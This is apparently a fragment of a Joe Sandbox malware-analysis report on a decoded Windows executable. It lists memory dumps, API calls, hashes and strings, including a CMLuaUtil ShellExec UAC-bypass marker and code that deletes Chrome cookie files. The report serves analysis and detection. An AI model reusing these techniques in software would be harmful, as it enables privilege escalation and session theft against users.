                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: Process$OpenProcess32$NextWow64$CloseCreateCurrentFirstHandleSnapshotToolhelp32
                                                                                                                                                                                                                                                                                                                              • String ID: PgF
                                                                                                                                                                                                                                                                                                                              • API String ID: 2180151492-654241383
                                                                                                                                                                                                                                                                                                                              • Opcode ID: 83d26750b717ed111933d1044fffe3928900f1353bad1f08cb3389c5db342b5d
                                                                                                                                                                                                                                                                                                                              • Instruction ID: d2ffcfca6af8ede7debefd7e7f3e1a30d02436113b149e9281f59cd47d6ae75e
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 83d26750b717ed111933d1044fffe3928900f1353bad1f08cb3389c5db342b5d
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: FE41E0311083415BC325F761D8A1AEFB7E9AFA4305F50453EF449931E1EF389949C65A
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • _ValidateLocalCookies.LIBCMT ref: 00437ABB
                                                                                                                                                                                                                                                                                                                              • ___except_validate_context_record.LIBVCRUNTIME ref: 00437AC3
                                                                                                                                                                                                                                                                                                                              • _ValidateLocalCookies.LIBCMT ref: 00437B51
                                                                                                                                                                                                                                                                                                                              • __IsNonwritableInCurrentImage.LIBCMT ref: 00437B7C
                                                                                                                                                                                                                                                                                                                              • _ValidateLocalCookies.LIBCMT ref: 00437BD1
                                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                                                                                                                                                                                                                                              • String ID: csm
                                                                                                                                                                                                                                                                                                                              • API String ID: 1170836740-1018135373
                                                                                                                                                                                                                                                                                                                              • Opcode ID: a717e1e029c36c18052b78818950a58a3847fd0af0d72a643a188b4f53f37093
                                                                                                                                                                                                                                                                                                                              • Instruction ID: 71a827b8039fc8fef17eb0172cb9efd804432aff4b2936af944e1c8a38ed202f
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a717e1e029c36c18052b78818950a58a3847fd0af0d72a643a188b4f53f37093
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 07410870A04209DBCF20EF29C884A9FBBB4AF08328F149156E8556B352D739EE01CF95
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • _ValidateLocalCookies.LIBCMT ref: 0283339B
                                                                                                                                                                                                                                                                                                                              • ___except_validate_context_record.LIBVCRUNTIME ref: 028333A3
                                                                                                                                                                                                                                                                                                                              • _ValidateLocalCookies.LIBCMT ref: 02833431
                                                                                                                                                                                                                                                                                                                              • __IsNonwritableInCurrentImage.LIBCMT ref: 0283345C
                                                                                                                                                                                                                                                                                                                              • _ValidateLocalCookies.LIBCMT ref: 028334B1
                                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4572333213.0000000002831000.00000040.00001000.00020000.00000000.sdmp, Offset: 02830000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4572288883.0000000002830000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4572333213.0000000002846000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_2830000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                                                                                                                                                                                                                                              • String ID: csm
                                                                                                                                                                                                                                                                                                                              • API String ID: 1170836740-1018135373
                                                                                                                                                                                                                                                                                                                              • Opcode ID: f3b3c3011ca0a543c31215e7edc77454e0460b0859e21e56f68863cebacec23b
                                                                                                                                                                                                                                                                                                                              • Instruction ID: 2bbf580f4215d19bc68ef05bf377d27f6a8d93afddf8e711cb39f0a373d51712
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f3b3c3011ca0a543c31215e7edc77454e0460b0859e21e56f68863cebacec23b
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 85418F3CE002089BCF12DF68D844A9EBBA5AF45328F14C1A5E919DB291D736AA15CBD1
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
• Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • std::_Lockit::_Lockit.LIBCPMT ref: 0040FBFC
                                                                                                                                                                                                                                                                                                                              • int.LIBCPMT ref: 0040FC0F
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0040CEE0: std::_Lockit::_Lockit.LIBCPMT ref: 0040CEF1
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0040CEE0: std::_Lockit::~_Lockit.LIBCPMT ref: 0040CF0B
                                                                                                                                                                                                                                                                                                                              • std::_Facet_Register.LIBCPMT ref: 0040FC4B
                                                                                                                                                                                                                                                                                                                              • std::_Lockit::~_Lockit.LIBCPMT ref: 0040FC71
                                                                                                                                                                                                                                                                                                                              • __CxxThrowException@8.LIBVCRUNTIME ref: 0040FC8D
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0044FA32: _free.LIBCMT ref: 0044FA5B
                                                                                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 0044FD39
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 00446AD5: RtlFreeHeap.NTDLL(00000000,00000000,?,0044FA60,?,00000000,?,00000000,?,0044FD04,?,00000007,?,?,00450215,?), ref: 00446AEB
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 00446AD5: GetLastError.KERNEL32(?,?,0044FA60,?,00000000,?,00000000,?,0044FD04,?,00000007,?,?,00450215,?,?), ref: 00446AFD
                                                                                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 0044FD44
                                                                                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 0044FD4F
                                                                                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 0044FDA3
                                                                                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 0044FDAE
                                                                                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 0044FDB9
                                                                                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 0044FDC4
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 02839221: _free.LIBCMT ref: 0283924A
                                                                                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 028392AB
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0283571E: HeapFree.KERNEL32(00000000,00000000,?,0283924F,?,00000000,?,00000000,?,02839276,?,00000007,?,?,02837E5A,?), ref: 02835734
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0283571E: GetLastError.KERNEL32(?,?,0283924F,?,00000000,?,00000000,?,02839276,?,00000007,?,?,02837E5A,?,?), ref: 02835746
                                                                                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 028392B6
                                                                                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 028392C1
                                                                                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 02839315
                                                                                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 02839320
                                                                                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 0283932B
                                                                                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 02839336
Memory Dump Source
• Source File: 00000000.00000002.4572333213.0000000002831000.00000040.00001000.00020000.00000000.sdmp, Offset: 02830000, based on PE: true
• Associated: 00000000.00000002.4572288883.0000000002830000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.4572333213.0000000002846000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_2830000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                                              • API String ID: 776569668-0
APIs
  • Part of subcall function 1001CCFE: _free.LIBCMT ref: 1001CD27
• _free.LIBCMT ref: 1001CD88
  • Part of subcall function 10015A65: RtlFreeHeap.NTDLL(00000000,00000000,?,1001CD2C,?,00000000,?,00000000,?,1001CD53,?,00000007,?,?,1001A21D,?), ref: 10015A7B
  • Part of subcall function 10015A65: GetLastError.KERNEL32(?,?,1001CD2C,?,00000000,?,00000000,?,1001CD53,?,00000007,?,?,1001A21D,?,?), ref: 10015A8D
• _free.LIBCMT ref: 1001CD93
• _free.LIBCMT ref: 1001CD9E
• _free.LIBCMT ref: 1001CDF2
• _free.LIBCMT ref: 1001CDFD
• _free.LIBCMT ref: 1001CE08
• _free.LIBCMT ref: 1001CE13
Memory Dump Source
• Source File: 00000000.00000002.4574030040.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000000.00000002.4574002401.0000000010000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.4574030040.000000001002B000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.4574030040.0000000010030000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.4574030040.0000000010032000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.4574230284.0000000010033000.00000004.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_10000000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
Similarity
• API ID: _free$ErrorFreeHeapLast
• String ID:
• API String ID: 776569668-0
APIs
• GetLastError.KERNEL32(?,?,1000C8A0,1000A6DD,1000AAB0), ref: 1000CFB0
• ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 1000CFBE
• ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 1000CFD7
• SetLastError.KERNEL32(00000000,?,1000C8A0,1000A6DD,1000AAB0), ref: 1000D029
Memory Dump Source
• Source File: 00000000.00000002.4574030040.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000000.00000002.4574002401.0000000010000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.4574030040.000000001002B000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.4574030040.0000000010030000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.4574030040.0000000010032000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.4574230284.0000000010033000.00000004.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_10000000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
Similarity
• API ID: ErrorLastValue___vcrt_
• String ID:
• API String ID: 3852720340-0
APIs
• CoInitializeEx.OLE32(00000000,00000002,00000000,C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe), ref: 00406835
  • Part of subcall function 00406764: _wcslen.LIBCMT ref: 00406788
  • Part of subcall function 00406764: CoGetObject.OLE32(?,00000024,004659B0,00000000), ref: 004067E9
• CoUninitialize.OLE32 ref: 0040688E
Strings
• C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe, xrefs: 00406815, 00406818, 0040686A
• [+] before ShellExec, xrefs: 00406856
• [+] ucmCMLuaUtilShellExecMethod, xrefs: 0040681A
• [+] ShellExec success, xrefs: 00406873
Memory Dump Source
• Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
Yara matches
Similarity
• API ID: InitializeObjectUninitialize_wcslen
• String ID: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe$[+] ShellExec success$[+] before ShellExec$[+] ucmCMLuaUtilShellExecMethod
• API String ID: 3851391207-3740688872
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • std::_Lockit::_Lockit.LIBCPMT ref: 0040FEDF
                                                                                                                                                                                                                                                                                                                              • int.LIBCPMT ref: 0040FEF2
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0040CEE0: std::_Lockit::_Lockit.LIBCPMT ref: 0040CEF1
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0040CEE0: std::_Lockit::~_Lockit.LIBCPMT ref: 0040CF0B
                                                                                                                                                                                                                                                                                                                              • std::_Facet_Register.LIBCPMT ref: 0040FF2E
                                                                                                                                                                                                                                                                                                                              • std::_Lockit::~_Lockit.LIBCPMT ref: 0040FF54
                                                                                                                                                                                                                                                                                                                              • __CxxThrowException@8.LIBVCRUNTIME ref: 0040FF70
                                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_RegisterThrow
                                                                                                                                                                                                                                                                                                                              • String ID: h]G
                                                                                                                                                                                                                                                                                                                              • API String ID: 2536120697-1579725984
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Cookies), ref: 0040B2E4
                                                                                                                                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 0040B2EE
                                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                                              • [Chrome Cookies found, cleared!], xrefs: 0040B314
                                                                                                                                                                                                                                                                                                                              • [Chrome Cookies not found], xrefs: 0040B308
                                                                                                                                                                                                                                                                                                                              • \AppData\Local\Google\Chrome\User Data\Default\Cookies, xrefs: 0040B2AF
                                                                                                                                                                                                                                                                                                                              • UserProfile, xrefs: 0040B2B4
                                                                                                                                                                                                                                                                                                                              • API ID: DeleteErrorFileLast
                                                                                                                                                                                                                                                                                                                              • String ID: [Chrome Cookies found, cleared!]$[Chrome Cookies not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Cookies
                                                                                                                                                                                                                                                                                                                              • API String ID: 2018770650-304995407
                                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                                              • BG, xrefs: 00406909
                                                                                                                                                                                                                                                                                                                              • C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe, xrefs: 00406927
                                                                                                                                                                                                                                                                                                                              • fyhstga-ONSWMZ, xrefs: 0040693F
                                                                                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                                                                                              • String ID: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe$fyhstga-ONSWMZ$BG
                                                                                                                                                                                                                                                                                                                              • API String ID: 0-636943447
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 00443315
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 00446AD5: RtlFreeHeap.NTDLL(00000000,00000000,?,0044FA60,?,00000000,?,00000000,?,0044FD04,?,00000007,?,?,00450215,?), ref: 00446AEB
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 00446AD5: GetLastError.KERNEL32(?,?,0044FA60,?,00000000,?,00000000,?,0044FD04,?,00000007,?,?,00450215,?,?), ref: 00446AFD
                                                                                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 00443327
                                                                                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 0044333A
                                                                                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 0044334B
                                                                                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 0044335C
                                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                                                                                                              • String ID: 09~
                                                                                                                                                                                                                                                                                                                              • API String ID: 776569668-1645473027
                                                                                                                                                                                                                                                                                                                              • Opcode ID: ab870860b33c9a3cd44b9e2e3565930e421ff68453c6808a8f097650461ead98
                                                                                                                                                                                                                                                                                                                              • Instruction ID: ba617ab3bec5ed021708e8d9793ec2f19a393bb4d037fa002b455214101d6763
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ab870860b33c9a3cd44b9e2e3565930e421ff68453c6808a8f097650461ead98
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E1F03AB08075208FA712AF6DBD014493BA1F706764342513BF41AB2A71EB780D81DA8E
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0041A696: GetLocalTime.KERNEL32(00000000), ref: 0041A6B0
                                                                                                                                                                                                                                                                                                                              • GetModuleHandleA.KERNEL32(00000000,00020009), ref: 00419F74
                                                                                                                                                                                                                                                                                                                              • PlaySoundW.WINMM(00000000,00000000), ref: 00419F82
                                                                                                                                                                                                                                                                                                                              • Sleep.KERNEL32(00002710), ref: 00419F89
                                                                                                                                                                                                                                                                                                                              • PlaySoundW.WINMM(00000000,00000000,00000000), ref: 00419F92
                                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: PlaySound$HandleLocalModuleSleepTime
                                                                                                                                                                                                                                                                                                                              • String ID: Alarm triggered$`#v
                                                                                                                                                                                                                                                                                                                              • API String ID: 614609389-3049340936
                                                                                                                                                                                                                                                                                                                              • Opcode ID: 923fe6478d4330ed0a62adeb58af83d2e410951945d701d981ba93eeae9722cd
                                                                                                                                                                                                                                                                                                                              • Instruction ID: 9f384250976fc0018356f16acd63f039c2840ecbd7916ddbe948a6dbceb933d3
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 923fe6478d4330ed0a62adeb58af83d2e410951945d701d981ba93eeae9722cd
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0AE09A22A0422037862033BA7C0FC2F3E28DAC6B71B4000BFF905A61A2AE540810C6FB
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • __allrem.LIBCMT ref: 00439799
                                                                                                                                                                                                                                                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004397B5
                                                                                                                                                                                                                                                                                                                              • __allrem.LIBCMT ref: 004397CC
                                                                                                                                                                                                                                                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004397EA
                                                                                                                                                                                                                                                                                                                              • __allrem.LIBCMT ref: 00439801
                                                                                                                                                                                                                                                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043981F
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                                              • API String ID: 1992179935-0
                                                                                                                                                                                                                                                                                                                              • Opcode ID: 9c67cb4fed110ca44ac0cc586ac5e74db1fc7c48150eab0f41685f45472ef8a2
                                                                                                                                                                                                                                                                                                                              • Instruction ID: 580a0d75dc01f3f4b0c8d364acae3af6b21ca74026922d198920ae34195595c3
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9c67cb4fed110ca44ac0cc586ac5e74db1fc7c48150eab0f41685f45472ef8a2
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8581FC71A01B069BE724AE69CC82B5F73A8AF89368F24512FF411D7381E7B8DD018758
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00000100,02836FFD,00000000,?,?,?,02838A72,?,?,00000100), ref: 0283887B
                                                                                                                                                                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?,?,?,?,02838A72,?,?,00000100,5EFC4D8B,?,?), ref: 02838901
                                                                                                                                                                                                                                                                                                                              • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,5EFC4D8B,00000100,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 028389FB
                                                                                                                                                                                                                                                                                                                              • __freea.LIBCMT ref: 02838A08
  • Part of subcall function 028356D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 02835702
• __freea.LIBCMT ref: 02838A11
• __freea.LIBCMT ref: 02838A36
Memory Dump Source
• Source File: 00000000.00000002.4572333213.0000000002831000.00000040.00001000.00020000.00000000.sdmp, Offset: 02830000, based on PE: true
• Associated: 00000000.00000002.4572288883.0000000002830000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.4572333213.0000000002846000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2830000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
Similarity
• API ID: ByteCharMultiWide__freea$AllocateHeap
• String ID:
• API String ID: 1414292761-0
• Opcode ID: 587dc8c823f502465d31c5a91bdd88df8d7abd6948e949faa9bbe4e7598599a5
• Instruction ID: 50ca1f63e318c9d1f6e333fa78f236c5eb4570c461cf805e154e1d0ac3357728
• Opcode Fuzzy Hash: 587dc8c823f502465d31c5a91bdd88df8d7abd6948e949faa9bbe4e7598599a5
• Instruction Fuzzy Hash: F351E7BE610216AFDF268E64CC44FBB77AAEB44754F154628FC09D6140EB34DC60CAD2
APIs
